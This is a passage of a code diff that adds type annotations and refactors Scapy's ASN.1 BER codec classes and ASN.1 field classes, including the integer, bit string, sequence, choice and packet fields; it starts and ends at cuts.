ASN1_DECODING_ERROR(s, exc=e), b"" except ASN1_Error as e: - return ASN1_DECODING_ERROR(s, exc=e), "" + return ASN1_DECODING_ERROR(s, exc=e), b"" @classmethod - def safedec(cls, s, context=None): + def safedec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + ): + # type: (...) -> Tuple[Union[_ASN1_ERROR, ASN1_Object[_K]], bytes] return cls.dec(s, context, safe=True) @classmethod def enc(cls, s): + # type: (_K) -> bytes if isinstance(s, six.string_types + (bytes,)): return BERcodec_STRING.enc(s) else: - return BERcodec_INTEGER.enc(int(s)) + try: + return BERcodec_INTEGER.enc(int(s)) # type: ignore + except TypeError: + raise TypeError("Trying to encode an invalid value !") ASN1_Codecs.BER.register_stem(BERcodec_Object) @@ -311,29 +400,35 @@ def enc(cls, s): # BERcodec objects # ########################## -class BERcodec_INTEGER(BERcodec_Object): +class BERcodec_INTEGER(BERcodec_Object[int]): tag = ASN1_Class_UNIVERSAL.INTEGER @classmethod def enc(cls, i): - s = [] + # type: (int) -> bytes + ls = [] while True: - s.append(i & 0xff) + ls.append(i & 0xff) if -127 <= i < 0: break if 128 <= i <= 255: - s.append(0) + ls.append(0) i >>= 8 if not i: break - s = [chb(hash(c)) for c in s] + s = [chb(hash(c)) for c in ls] s.append(BER_len_enc(len(s))) s.append(chb(hash(cls.tag))) s.reverse() return b"".join(s) @classmethod - def do_dec(cls, s, context=None, safe=False): + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False, # type: bool + ): + # type: (...) -> Tuple[ASN1_Object[int], bytes] l, s, t = cls.check_type_check_len(s) x = 0 if s: @@ -349,11 +444,16 @@ class BERcodec_BOOLEAN(BERcodec_INTEGER): tag = ASN1_Class_UNIVERSAL.BOOLEAN -class BERcodec_BIT_STRING(BERcodec_Object): +class BERcodec_BIT_STRING(BERcodec_Object[str]): tag = ASN1_Class_UNIVERSAL.BIT_STRING @classmethod - def do_dec(cls, s, context=None, safe=False): + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False # type: bool + ): + # type: (...) -> Tuple[ASN1_Object[str], bytes] # /!\ the unused_bits information is lost after this decoding l, s, t = cls.check_type_check_len(s) if len(s) > 0: @@ -363,10 +463,10 @@ def do_dec(cls, s, context=None, safe=False): "BERcodec_BIT_STRING: too many unused_bits advertised", remaining=s ) - s = "".join(binrepr(orb(x)).zfill(8) for x in s[1:]) + fs = "".join(binrepr(orb(x)).zfill(8) for x in s[1:]) if unused_bits > 0: - s = s[:-unused_bits] - return cls.tag.asn1_object(s), t + fs = fs[:-unused_bits] + return cls.tag.asn1_object(fs), t else: raise BER_Decoding_Error( "BERcodec_BIT_STRING found no content " @@ -375,9 +475,10 @@ def do_dec(cls, s, context=None, safe=False): ) @classmethod - def enc(cls, s): + def enc(cls, _s): + # type: (AnyStr) -> bytes # /!\ this is DER encoding (bit strings are only zero-bit padded) - s = bytes_encode(s) + s = bytes_encode(_s) if len(s) % 8 == 0: unused_bits = 0 else: @@ -389,17 +490,23 @@ def enc(cls, s): return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s -class BERcodec_STRING(BERcodec_Object): +class BERcodec_STRING(BERcodec_Object[str]): tag = ASN1_Class_UNIVERSAL.STRING @classmethod - def enc(cls, s): - s = bytes_encode(s) + def enc(cls, _s): + # type: (str) -> bytes + s = bytes_encode(_s) # Be sure we are encoding bytes return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s @classmethod - def do_dec(cls, s, context=None, safe=False): + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False, # type: bool + ): + # type: (...) -> Tuple[ASN1_Object[Any], bytes] l, s, t = cls.check_type_check_len(s) return cls.tag.asn1_object(s), t @@ -409,18 +516,20 @@ class BERcodec_NULL(BERcodec_INTEGER): @classmethod def enc(cls, i): + # type: (int) -> bytes if i == 0: return chb(hash(cls.tag)) + b"\0" else: return super(cls, cls).enc(i) -class BERcodec_OID(BERcodec_Object): +class BERcodec_OID(BERcodec_Object[bytes]): tag = ASN1_Class_UNIVERSAL.OID @classmethod - def enc(cls, oid): - oid = bytes_encode(oid) + def enc(cls, _oid): + # type: (AnyStr) -> bytes + oid = bytes_encode(_oid) if oid: lst = [int(x) for x in oid.strip(b".").split(b".")] else: @@ -432,7 +541,12 @@ def enc(cls, oid): return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s @classmethod - def do_dec(cls, s, context=None, safe=False): + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False, # type: bool + ): + # type: (...) -> Tuple[ASN1_Object[bytes], bytes] l, s, t = cls.check_type_check_len(s) lst = [] while s: @@ -495,17 +609,25 @@ class BERcodec_BMP_STRING(BERcodec_STRING): tag = ASN1_Class_UNIVERSAL.BMP_STRING -class BERcodec_SEQUENCE(BERcodec_Object): +class BERcodec_SEQUENCE(BERcodec_Object[Union[bytes, List[BERcodec_Object[Any]]]]): # noqa: E501 tag = ASN1_Class_UNIVERSAL.SEQUENCE @classmethod - def enc(cls, ll): - if not isinstance(ll, bytes): - ll = b"".join(x.enc(cls.codec) for x in ll) + def enc(cls, _ll): + # type: (Union[bytes, List[BERcodec_Object[Any]]]) -> bytes + if isinstance(_ll, bytes): + ll = _ll + else: + ll = b"".join(x.enc(cls.codec) for x in _ll) return chb(hash(cls.tag)) + BER_len_enc(len(ll)) + ll @classmethod - def do_dec(cls, s, context=None, safe=False): + def do_dec(cls, + s, # type: bytes + context=None, # type: Optional[Type[ASN1_Class]] + safe=False # type: bool + ): + # type: (...) -> Tuple[ASN1_Object[Union[bytes, List[Any]]], bytes] if context is None: context = cls.tag.context ll, st = cls.check_type_get_len(s) # we may have len(s) < ll @@ -513,7 +635,10 @@ def do_dec(cls, s, context=None, safe=False): obj = [] while s: try: - o, s = BERcodec_Object.dec(s, context, safe) + o, remain = BERcodec_Object.dec( + s, context, safe + ) # type: Tuple[ASN1_Object[Any], bytes] + s = remain except BER_Decoding_Error as err: err.remaining += t if err.decoded is not None: @@ -536,6 +661,7 @@ class BERcodec_IPADDRESS(BERcodec_STRING): @classmethod def enc(cls, ipaddr_ascii): + # type: (str) -> bytes try: s = inet_aton(ipaddr_ascii) except Exception: @@ -544,6 +670,7 @@ def enc(cls, ipaddr_ascii): @classmethod def do_dec(cls, s, context=None, safe=False): + # type: (bytes, Optional[Any], bool) -> Tuple[ASN1_Object[str], bytes] l, s, t = cls.check_type_check_len(s) try: ipaddr_ascii = inet_ntoa(s) diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 87679b55077..ec4bc773989 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -9,20 +9,59 @@ """ from __future__ import absolute_import -from scapy.asn1.asn1 import ASN1_Class_UNIVERSAL, ASN1_NULL, ASN1_Error, \ - ASN1_Object, ASN1_INTEGER -from scapy.asn1.ber import BER_tagging_dec, BER_Decoding_Error, BER_id_dec, \ - BER_tagging_enc -from scapy.volatile import RandInt, RandChoice, RandNum, RandString, RandOID, \ - GeneralizedTime -from scapy.compat import orb, raw +from scapy.asn1.asn1 import ( + ASN1_BIT_STRING, + ASN1_BOOLEAN, + ASN1_Class, + ASN1_Class_UNIVERSAL, + ASN1_Error, + ASN1_INTEGER, + ASN1_NULL, + ASN1_OID, + ASN1_Object, + ASN1_STRING, +) +from scapy.asn1.ber import ( + BER_Decoding_Error, + BER_id_dec, + BER_tagging_dec, + BER_tagging_enc, +) +from scapy.volatile import ( + GeneralizedTime, + RandChoice, + RandInt, + RandNum, + RandOID, + RandString, + VolatileValue, +) +from scapy.compat import raw from scapy.base_classes import BasePacket -from scapy.utils import binrepr from scapy import packet from functools import reduce import scapy.modules.six as six from scapy.modules.six.moves import range +from scapy.compat import ( + Any, + AnyStr, + Dict, + Generic, + List, + Optional, + Tuple, + Type, + TypeVar, + Union, + _Generic_metaclass, + cast, + TYPE_CHECKING, +) + +if TYPE_CHECKING: + from scapy.asn1packet import ASN1_Packet + class ASN1F_badsequence(Exception): pass @@ -36,23 +75,35 @@ class ASN1F_element(object): # Basic ASN1 Field # ########################## -class ASN1F_field(ASN1F_element): +_I = TypeVar('_I') # Internal storage +_A = TypeVar('_A') # ASN.1 object + + +@six.add_metaclass(_Generic_metaclass) +class ASN1F_field(ASN1F_element, Generic[_I, _A]): holds_packets = 0 islist = 0 ASN1_tag = ASN1_Class_UNIVERSAL.ANY - context = ASN1_Class_UNIVERSAL - - def __init__(self, name, default, context=None, - implicit_tag=None, explicit_tag=None, - flexible_tag=False): - self.context = context + context = ASN1_Class_UNIVERSAL # type: Type[ASN1_Class] + + def __init__(self, + name, # type: str + default, # type: Optional[_A] + context=None, # type: Optional[Type[ASN1_Class]] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[int] + flexible_tag=False, # type: Optional[bool] + ): + # type: (...) -> None + if context is not None: + self.context = context self.name = name if default is None: - self.default = None + self.default = default # type: Optional[_A] elif isinstance(default, ASN1_NULL): - self.default = default + self.default = default # type: ignore else: - self.default = self.ASN1_tag.asn1_object(default) + self.default = self.ASN1_tag.asn1_object(default) # type: ignore self.flexible_tag = flexible_tag if (implicit_tag is not None) and (explicit_tag is not None): err_msg = "field cannot be both implicitly and explicitly tagged" @@ -60,18 +111,18 @@ def __init__(self, name, default, context=None, self.implicit_tag = implicit_tag self.explicit_tag = explicit_tag # network_tag gets useful for ASN1F_CHOICE - self.network_tag = implicit_tag or explicit_tag or self.ASN1_tag + self.network_tag = int(implicit_tag or explicit_tag or self.ASN1_tag) def i2repr(self, pkt, x): + # type: (ASN1_Packet, _I) -> str return repr(x) def i2h(self, pkt, x): - return x - - def any2i(self, pkt, x): + # type: (ASN1_Packet, _I) -> Any return x def m2i(self, pkt, s): + # type: (ASN1_Packet, bytes) -> Tuple[_A, bytes] """ The good thing about safedec is that it may still decode ASN1 even if there is a mismatch between the expected tag (self.ASN1_tag) @@ -96,11 +147,12 @@ def m2i(self, pkt, s): self.explicit_tag = diff_tag codec = self.ASN1_tag.get_codec(pkt.ASN1_codec) if self.flexible_tag: - return codec.safedec(s, context=self.context) + return codec.safedec(s, context=self.context) # type: ignore else: - return codec.dec(s, context=self.context) + return codec.dec(s, context=self.context) # type: ignore def i2m(self, pkt, x): + # type: (ASN1_Packet, Union[bytes, _I, _A]) -> bytes if x is None: return b"" if isinstance(x, ASN1_Object): @@ -116,30 +168,39 @@ def i2m(self, pkt, x): return BER_tagging_enc(s, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) - def extract_packet(self, cls, s): - if len(s) > 0: - try: - c = cls(s) - except ASN1F_badsequence: - c = packet.Raw(s) - cpad = c.getlayer(packet.Raw) - s = b"" - if cpad is not None: - s = cpad.load + def any2i(self, pkt, x): + # type: (ASN1_Packet, Any) -> _I + return cast(_I, x) + + def extract_packet(self, + cls, # type: Type[ASN1_Packet] + s, # type: bytes + ): + # type: (...) -> Tuple[ASN1_Packet, bytes] + try: + c = cls(s) + except ASN1F_badsequence: + c = packet.Raw(s) + cpad = c.getlayer(packet.Raw) + s = b"" + if cpad is not None: + s = cpad.load + if cpad.underlayer: del(cpad.underlayer.payload) - return c, s - else: - return None, s + return c, s def build(self, pkt): + # type: (ASN1_Packet) -> bytes return self.i2m(pkt, getattr(pkt, self.name)) def dissect(self, pkt, s): + # type: (ASN1_Packet, bytes) -> bytes v, s = self.m2i(pkt, s) self.set_val(pkt, v) return s def do_copy(self, x): + # type: (Any) -> Any if hasattr(x, "copy"): return x.copy() if isinstance(x, list): @@ -150,18 +211,23 @@ def do_copy(self, x): return x def set_val(self, pkt, val): + # type: (ASN1_Packet, Any) -> None setattr(pkt, self.name, val) def is_empty(self, pkt): + # type: (ASN1_Packet) -> bool return getattr(pkt, self.name) is None def get_fields_list(self): + # type: () -> List[ASN1F_field[Any, Any]] return [self] def __str__(self): + # type: () -> str return repr(self) def randval(self): + # type: () -> VolatileValue return RandInt() @@ -169,44 +235,65 @@ def randval(self): # Simple ASN1 Fields # ############################ -class ASN1F_BOOLEAN(ASN1F_field): +class ASN1F_BOOLEAN(ASN1F_field[bool, ASN1_BOOLEAN]): ASN1_tag = ASN1_Class_UNIVERSAL.BOOLEAN def randval(self): + # type: () -> RandChoice return RandChoice(True, False) -class ASN1F_INTEGER(ASN1F_field): +class ASN1F_INTEGER(ASN1F_field[int, ASN1_INTEGER]): ASN1_tag = ASN1_Class_UNIVERSAL.INTEGER def randval(self): + # type: () -> RandNum return RandNum(-2**64, 2**64 - 1) class ASN1F_enum_INTEGER(ASN1F_INTEGER): - def __init__(self, name, default, enum, context=None, - implicit_tag=None, explicit_tag=None): - ASN1F_INTEGER.__init__(self, name, default, context=context, - implicit_tag=implicit_tag, - explicit_tag=explicit_tag) - i2s = self.i2s = {} - s2i = self.s2i = {} + def __init__(self, + name, # type: str + default, # type: ASN1_INTEGER + enum, # type: Dict[int, str] + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[Any] + explicit_tag=None, # type: Optional[Any] + ): + # type: (...) -> None + super(ASN1F_enum_INTEGER, self).__init__( + name, default, context=context, + implicit_tag=implicit_tag, + explicit_tag=explicit_tag + ) + i2s = self.i2s = {} # type: Dict[int, str] + s2i = self.s2i = {} # type: Dict[str, int] if isinstance(enum, list): keys = range(len(enum)) else: keys = list(enum) if any(isinstance(x, six.string_types) for x in keys): - i2s, s2i = s2i, i2s + i2s, s2i = s2i, i2s # type: ignore for k in keys: i2s[k] = enum[k] s2i[enum[k]] = k - def i2m(self, pkt, s): - if isinstance(s, str): - s = self.s2i.get(s) - return super(ASN1F_enum_INTEGER, self).i2m(pkt, s) - - def i2repr(self, pkt, x): + def i2m(self, + pkt, # type: ASN1_Packet + s, # type: Union[bytes, str, int, ASN1_INTEGER] + ): + # type: (...) -> bytes + if not isinstance(s, str): + vs = s + else: + vs = self.s2i[s] + return super(ASN1F_enum_INTEGER, self).i2m(pkt, vs) + + def i2repr(self, + pkt, # type: ASN1_Packet + x, # type: Union[str, int] + ): + # type: (...) -> str if x is not None and isinstance(x, ASN1_INTEGER): r = self.i2s.get(x.val) if r: @@ -214,25 +301,39 @@ def i2repr(self, pkt, x): return repr(x) -class ASN1F_BIT_STRING(ASN1F_field): +class ASN1F_BIT_STRING(ASN1F_field[str, ASN1_BIT_STRING]): ASN1_tag = ASN1_Class_UNIVERSAL.BIT_STRING - def __init__(self, name, default, default_readable=True, context=None, - implicit_tag=None, explicit_tag=None): - if default is not None and default_readable: - default = b"".join(binrepr(orb(x)).zfill(8).encode("utf8") for x in default) # noqa: E501 - ASN1F_field.__init__(self, name, default, context=context, - implicit_tag=implicit_tag, - explicit_tag=explicit_tag) + def __init__(self, + name, # type: str + default, # type: Optional[Union[ASN1_BIT_STRING, AnyStr]] + default_readable=True, # type: bool + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[int] + ): + # type: (...) -> None + super(ASN1F_BIT_STRING, self).__init__( + name, None, context=context, + implicit_tag=implicit_tag, + explicit_tag=explicit_tag + ) + if isinstance(default, (bytes, str)): + self.default = ASN1_BIT_STRING(default, + readable=default_readable) + else: + self.default = default def randval(self): + # type: () -> RandString return RandString(RandNum(0, 1000)) -class ASN1F_STRING(ASN1F_field): +class ASN1F_STRING(ASN1F_field[str, ASN1_STRING]): ASN1_tag = ASN1_Class_UNIVERSAL.STRING def randval(self): + # type: () -> RandString return RandString(RandNum(0, 1000)) @@ -240,10 +341,11 @@ class ASN1F_NULL(ASN1F_INTEGER): ASN1_tag = ASN1_Class_UNIVERSAL.NULL -class ASN1F_OID(ASN1F_field): +class ASN1F_OID(ASN1F_field[str, ASN1_OID]): ASN1_tag = ASN1_Class_UNIVERSAL.OID def randval(self): + # type: () -> RandOID return RandOID() @@ -279,6 +381,7 @@ class ASN1F_UTC_TIME(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.UTC_TIME def randval(self): + # type: () -> GeneralizedTime return GeneralizedTime() @@ -286,6 +389,7 @@ class ASN1F_GENERALIZED_TIME(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.GENERALIZED_TIME def randval(self): + # type: () -> GeneralizedTime return GeneralizedTime() @@ -301,7 +405,7 @@ class ASN1F_BMP_STRING(ASN1F_STRING): ASN1_tag = ASN1_Class_UNIVERSAL.BMP_STRING -class ASN1F_SEQUENCE(ASN1F_field): +class ASN1F_SEQUENCE(ASN1F_field[List[Any], List[Any]]): # Here is how you could decode a SEQUENCE # with an unknown, private high-tag prefix : # class PrivSeq(ASN1_Packet): @@ -317,28 +421,36 @@ class ASN1F_SEQUENCE(ASN1F_field): holds_packets = 1 def __init__(self, *seq, **kwargs): + # type: (*Any, **Any) -> None name = "dummy_seq_name" default = [field.default for field in seq] for kwarg in ["context", "implicit_tag", "explicit_tag", "flexible_tag"]: setattr(self, kwarg, kwargs.get(kwarg)) - ASN1F_field.__init__(self, name, default, context=self.context, - implicit_tag=self.implicit_tag, - explicit_tag=self.explicit_tag, - flexible_tag=self.flexible_tag) + super(ASN1F_SEQUENCE, self).__init__( + name, default, context=self.context, + implicit_tag=self.implicit_tag, + explicit_tag=self.explicit_tag, + flexible_tag=self.flexible_tag + ) self.seq = seq self.islist = len(seq) > 1 def __repr__(self): + # type: () -> str return "<%s%r>" % (self.__class__.__name__, self.seq) def is_empty(self, pkt): + # type: (ASN1_Packet) -> bool return all(f.is_empty(pkt) for f in self.seq) def get_fields_list(self): - return reduce(lambda x, y: x + y.get_fields_list(), self.seq, []) + # type: () -> List[ASN1F_field[Any, Any]] + return reduce(lambda x, y: x + y.get_fields_list(), # type: ignore + self.seq, []) def m2i(self, pkt, s): + # type: (Any, bytes) -> Tuple[Any, bytes] """ ASN1F_SEQUENCE behaves transparently, with nested ASN1_objects being dissected one by one. Because we use obj.dissect (see loop below) @@ -372,34 +484,54 @@ def m2i(self, pkt, s): return [], remain def dissect(self, pkt, s): + # type: (Any, bytes) -> bytes _, x = self.m2i(pkt, s) return x def build(self, pkt): - s = reduce(lambda x, y: x + y.build(pkt), self.seq, b"") - return self.i2m(pkt, s) + # type: (ASN1_Packet) -> bytes + s = reduce(lambda x, y: x + y.build(pkt), # type: ignore + self.seq, b"") + return super(ASN1F_SEQUENCE, self).i2m(pkt, s) class ASN1F_SET(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_UNIVERSAL.SET -class ASN1F_SEQUENCE_OF(ASN1F_field): +class ASN1F_SEQUENCE_OF(ASN1F_field[List['ASN1_Packet'], + List['ASN1_Packet']]): ASN1_tag = ASN1_Class_UNIVERSAL.SEQUENCE holds_packets = 1 islist = 1 - def __init__(self, name, default, cls, context=None, - implicit_tag=None, explicit_tag=None): + def __init__(self, + name, # type: str + default, # type: List[ASN1_Packet] + cls, # type: Type[ASN1_Packet] + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[Any] + explicit_tag=None, # type: Optional[Any] + ): + # type: (...) -> None self.cls = cls - ASN1F_field.__init__(self, name, None, context=context, - implicit_tag=implicit_tag, explicit_tag=explicit_tag) # noqa: E501 + super(ASN1F_SEQUENCE_OF, self).__init__( + name, None, context=context, + implicit_tag=implicit_tag, explicit_tag=explicit_tag + ) self.default = default - def is_empty(self, pkt): + def is_empty(self, + pkt, # type: ASN1_Packet + ): + # type: (...) -> bool return ASN1F_field.is_empty(self, pkt) - def m2i(self, pkt, s): + def m2i(self, + pkt, # type: ASN1_Packet + s, # type: bytes + ): + # type: (...) -> Tuple[List[ASN1_Packet], bytes] diff_tag, s = BER_tagging_dec(s, hidden_tag=self.ASN1_tag, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, @@ -414,15 +546,18 @@ def m2i(self, pkt, s): lst = [] while s: c, s = self.extract_packet(self.cls, s) - lst.append(c) + if c: + lst.append(c) if len(s) > 0: raise BER_Decoding_Error("unexpected remainder", remaining=s) return lst, remain def build(self, pkt): + # type: (ASN1_Packet) -> bytes val = getattr(pkt, self.name) - if isinstance(val, ASN1_Object) and val.tag == ASN1_Class_UNIVERSAL.RAW: # noqa: E501 - s = val + if isinstance(val, ASN1_Object) and \ + val.tag == ASN1_Class_UNIVERSAL.RAW: + s = cast(Union[List[ASN1_Packet], bytes], val) elif val is None: s = b"" else: @@ -430,9 +565,11 @@ def build(self, pkt): return self.i2m(pkt, s) def randval(self): + # type: () -> ASN1_Packet return packet.fuzz(self.cls()) def __repr__(self): + # type: () -> str return "<%s %s>" % (self.__class__.__name__, self.name) @@ -454,13 +591,16 @@ class ASN1F_TIME_TICKS(ASN1F_INTEGER): class ASN1F_optional(ASN1F_element): def __init__(self, field): + # type: (ASN1F_field[Any, Any]) -> None field.flexible_tag = False self._field = field def __getattr__(self, attr): + # type: (str) -> Optional[Any] return getattr(self._field, attr) def m2i(self, pkt, s): + # type: (ASN1_Packet, bytes) -> Tuple[Any, bytes] try: return self._field.m2i(pkt, s) except (ASN1_Error, ASN1F_badsequence, BER_Decoding_Error): @@ -468,6 +608,7 @@ def m2i(self, pkt, s): return None, s def dissect(self, pkt, s): + # type: (ASN1_Packet, bytes) -> bytes try: return self._field.dissect(pkt, s) except (ASN1_Error, ASN1F_badsequence, BER_Decoding_Error): @@ -475,18 +616,24 @@ def dissect(self, pkt, s): return s def build(self, pkt): + # type: (ASN1_Packet) -> bytes if self._field.is_empty(pkt): return b"" return self._field.build(pkt) def any2i(self, pkt, x): + # type: (ASN1_Packet, Any) -> Any return self._field.any2i(pkt, x) def i2repr(self, pkt, x): + # type: (ASN1_Packet, Any) -> str return self._field.i2repr(pkt, x) -class ASN1F_CHOICE(ASN1F_field): +_CHOICE_T = Union['ASN1_Packet', Type[ASN1F_field], 'ASN1F_PACKET'] + + +class ASN1F_CHOICE(ASN1F_field[_CHOICE_T, ASN1_Object[Any]]): """ Multiple types are allowed: ASN1_Packet, ASN1F_field and ASN1F_PACKET(), See layers/x509.py for examples. @@ -496,35 +643,46 @@ class ASN1F_CHOICE(ASN1F_field): ASN1_tag = ASN1_Class_UNIVERSAL.ANY def __init__(self, name, default, *args, **kwargs): + # type: (str, Any, *_CHOICE_T, **Any) -> None if "implicit_tag" in kwargs: err_msg = "ASN1F_CHOICE has been called with an implicit_tag" raise ASN1_Error(err_msg) self.implicit_tag = None for kwarg in ["context", "explicit_tag"]: setattr(self, kwarg, kwargs.get(kwarg)) - ASN1F_field.__init__(self, name, None, context=self.context, - explicit_tag=self.explicit_tag) + super(ASN1F_CHOICE, self).__init__( + name, None, context=self.context, + explicit_tag=self.explicit_tag + ) self.default = default self.current_choice = None - self.choices = {} + self.choices = {} # type: Dict[int, _CHOICE_T] self.pktchoices = {} for p in args: - if hasattr(p, "ASN1_root"): # should be ASN1_Packet + if hasattr(p, "ASN1_root"): + p = cast('ASN1_Packet', p) + # should be ASN1_Packet if hasattr(p.ASN1_root, "choices"): - for k, v in six.iteritems(p.ASN1_root.choices): - self.choices[k] = v # ASN1F_CHOICE recursion + root = cast(ASN1F_CHOICE, p.ASN1_root) + for k, v in six.iteritems(root.choices): + # ASN1F_CHOICE recursion + self.choices[k] = v else: self.choices[p.ASN1_root.network_tag] = p elif hasattr(p, "ASN1_tag"): - if isinstance(p, type): # should be ASN1F_field class - self.choices[p.ASN1_tag] = p - else: # should be ASN1F_PACKET instance + p = cast(Union[ASN1F_PACKET, Type[ASN1F_field[Any, Any]]], p) + if isinstance(p, type): + # should be ASN1F_field class + self.choices[int(p.ASN1_tag)] = p + else: + # should be ASN1F_field instance self.choices[p.network_tag] = p self.pktchoices[hash(p.cls)] = (p.implicit_tag, p.explicit_tag) # noqa: E501 else: raise ASN1_Error("ASN1F_CHOICE: no tag found for one field") def m2i(self, pkt, s): + # type: (ASN1_Packet, bytes) -> Tuple[ASN1_Object[Any], bytes] """ First we have to retrieve the appropriate choice. Then we extract the field/packet, according to this choice. @@ -534,14 +692,15 @@ def m2i(self, pkt, s): _, s = BER_tagging_dec(s, hidden_tag=self.ASN1_tag, explicit_tag=self.explicit_tag) tag, _ = BER_id_dec(s) - if tag not in self.choices: + if tag in self.choices: + choice = self.choices[tag] + else: if self.flexible_tag: choice = ASN1F_field else: raise ASN1_Error("ASN1F_CHOICE: unexpected field") - else: - choice = self.choices[tag] if hasattr(choice, "ASN1_root"): + choice = cast('ASN1_Packet', choice) # we don't want to import ASN1_Packet in this module... return self.extract_packet(choice, s) elif isinstance(choice, type): @@ -551,6 +710,7 @@ def m2i(self, pkt, s): return choice.m2i(pkt, s) def i2m(self, pkt, x): + # type: (ASN1_Packet, Any) -> bytes if x is None: s = b"" else: @@ -562,32 +722,46 @@ def i2m(self, pkt, x): return BER_tagging_enc(s, explicit_tag=self.explicit_tag) def randval(self): + # type: () -> RandChoice randchoices = [] for p in six.itervalues(self.choices): - if hasattr(p, "ASN1_root"): # should be ASN1_Packet class + if hasattr(p, "ASN1_root"): + # should be ASN1_Packet class randchoices.append(packet.fuzz(p())) elif hasattr(p, "ASN1_tag"): - if isinstance(p, type): # should be (basic) ASN1F_field class # noqa: E501 + if isinstance(p, type): + # should be (basic) ASN1F_field class randchoices.append(p("dummy", None).randval()) - else: # should be ASN1F_PACKET instance + else: + # should be ASN1F_PACKET instance randchoices.append(p.randval()) return RandChoice(*randchoices) -class ASN1F_PACKET(ASN1F_field): +class ASN1F_PACKET(ASN1F_field['ASN1_Packet', Optional['ASN1_Packet']]): holds_packets = 1 - def __init__(self, name, default, cls, context=None, - implicit_tag=None, explicit_tag=None): + def __init__(self, + name, # type: str + default, # type: Optional[ASN1_Packet] + cls, # type: Type[ASN1_Packet] + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[int] + ): + # type: (...) -> None self.cls = cls - ASN1F_field.__init__(self, name, None, context=context, - implicit_tag=implicit_tag, explicit_tag=explicit_tag) # noqa: E501 + super(ASN1F_PACKET, self).__init__( + name, None, context=context, + implicit_tag=implicit_tag, explicit_tag=explicit_tag + ) if cls.ASN1_root.ASN1_tag == ASN1_Class_UNIVERSAL.SEQUENCE: if implicit_tag is None and explicit_tag is None: self.network_tag = 16 | 0x20 self.default = default def m2i(self, pkt, s): + # type: (ASN1_Packet, bytes) -> Tuple[Any, bytes] diff_tag, s = BER_tagging_dec(s, hidden_tag=self.cls.ASN1_root.ASN1_tag, # noqa: E501 implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, @@ -597,18 +771,31 @@ def m2i(self, pkt, s): self.implicit_tag = diff_tag elif self.explicit_tag is not None: self.explicit_tag = diff_tag - p, s = self.extract_packet(self.cls, s) - return p, s + if not s: + return None, s + return self.extract_packet(self.cls, s) - def i2m(self, pkt, x): + def i2m(self, + pkt, # type: ASN1_Packet + x # type: Union[bytes, ASN1_Packet, None, ASN1_Object[Optional[ASN1_Packet]]] # noqa: E501 + ): + # type: (...) -> bytes if x is None: s = b"" + elif isinstance(x, bytes): + s = x + elif isinstance(x, ASN1_Object): + if x.val: + s = raw(x.val) + else: + s = b"" else: s = raw(x) return BER_tagging_enc(s, implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag) def randval(self): + # type: () -> ASN1_Packet return packet.fuzz(self.cls()) @@ -617,47 +804,73 @@ class ASN1F_BIT_STRING_ENCAPS(ASN1F_BIT_STRING): We may emulate simple string encapsulation with explicit_tag=0x04, but we need a specific class for bit strings because of unused bits, etc. """ - holds_packets = 1 + ASN1_tag = ASN1_Class_UNIVERSAL.BIT_STRING - def __init__(self, name, default, cls, context=None, - implicit_tag=None, explicit_tag=None): + def __init__(self, + name, # type: str + default, # type: Optional[ASN1_Packet] + cls, # type: Type[ASN1_Packet] + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[int] + ): + # type: (...) -> None self.cls = cls - ASN1F_BIT_STRING.__init__(self, name, None, context=context, - implicit_tag=implicit_tag, - explicit_tag=explicit_tag) - self.default = default - - def m2i(self, pkt, s): - bit_string, remain = ASN1F_BIT_STRING.m2i(self, pkt, s) + super(ASN1F_BIT_STRING_ENCAPS, self).__init__( + name, default and raw(default), context=context, + implicit_tag=implicit_tag, + explicit_tag=explicit_tag + ) + + def m2i(self, pkt, s): # type: ignore + # type: (ASN1_Packet, bytes) -> Tuple[Optional[ASN1_Packet], bytes] + bit_string, remain = super(ASN1F_BIT_STRING_ENCAPS, self).m2i(pkt, s) if len(bit_string.val) % 8 != 0: raise BER_Decoding_Error("wrong bit string", remaining=s) - p, s = self.extract_packet(self.cls, bit_string.val_readable) + if bit_string.val_readable: + p, s = self.extract_packet(self.cls, bit_string.val_readable) + else: + return None, bit_string.val_readable if len(s) > 0: raise BER_Decoding_Error("unexpected remainder", remaining=s) return p, remain - def i2m(self, pkt, x): + def i2m(self, pkt, x): # type: ignore + # type: (ASN1_Packet, Optional[ASN1_Packet]) -> bytes s = b"" if x is None else raw(x) - s = b"".join(binrepr(orb(x)).zfill(8).encode("utf8") for x in s) - return ASN1F_BIT_STRING.i2m(self, pkt, s) + return super(ASN1F_BIT_STRING_ENCAPS, self).i2m( + pkt, + ASN1_BIT_STRING(s, readable=True) + ) class ASN1F_FLAGS(ASN1F_BIT_STRING): - def __init__(self, name, default, mapping, context=None, - implicit_tag=None, explicit_tag=None): + def __init__(self, + name, # type: str + default, # type: Optional[str] + mapping, # type: List[str] + context=None, # type: Optional[Any] + implicit_tag=None, # type: Optional[int] + explicit_tag=None, # type: Optional[Any] + ): + # type: (...) -> None self.mapping = mapping - ASN1F_BIT_STRING.__init__(self, name, default, - default_readable=False, - context=context, - implicit_tag=implicit_tag, - explicit_tag=explicit_tag) + super(ASN1F_FLAGS, 